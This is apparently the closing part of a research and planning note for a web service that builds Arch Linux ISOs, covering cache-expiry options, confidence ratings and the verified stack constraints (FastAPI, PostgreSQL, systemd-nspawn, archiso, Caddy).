  • Arch is rolling release (packages update daily)
  • Cached ISOs may contain outdated/vulnerable packages

What's unclear:

  • Time-based expiry (e.g., max 7 days) vs. package version tracking?
  • How to detect when upstream packages update and invalidate cache?
  • Balance between cache efficiency and package freshness

Recommendation:

  • Phase 1: Simple approach: no caching (always build fresh)
  • Phase 2: Time-based cache expiry (7 days max)
  • Phase 3: Track package repository snapshot timestamps, invalidate when snapshot changes

Confidence: MEDIUM - Standard approach exists, but implementation details depend on Arch repository snapshot strategy


Metadata

Confidence breakdown:

  • Standard stack: HIGH - All technologies in active use for production FastAPI + PostgreSQL deployments in 2026
  • Architecture patterns: HIGH - Verified with official documentation and production examples
  • Security practices: HIGH - Based on official FastAPI security docs and established OWASP patterns
  • systemd-nspawn sandboxing: MEDIUM - Well-documented for general use, but specific archiso integration pattern not widely documented
  • Deterministic builds: MEDIUM - archiso MR #436 implemented determinism, but practical application details require experimentation
  • Pitfalls: HIGH - Based on documented incidents (CHAOS RAT malware), official docs warnings, and production failure patterns

Research date: 2026-01-25
Valid until: ~30 days (2026-02-25) - Technologies are stable, but security advisories and package versions may change

Critical constraints verified:

  • Python with FastAPI, SQLAlchemy, Alembic, Pydantic
  • PostgreSQL as database
  • Ruff as Python linter/formatter (NOT black/flake8/isort)
  • systemd-nspawn for sandboxing
  • archiso for ISO builds
  • <200ms p95 latency achievable with async FastAPI + asyncpg
  • ISO build within 15 minutes (mkarchiso baseline: 5-10 min)
  • HTTPS with Caddy automatic certificates
  • Rate limiting and CSRF protection libraries available
  • Deterministic builds supported via SOURCE_DATE_EPOCH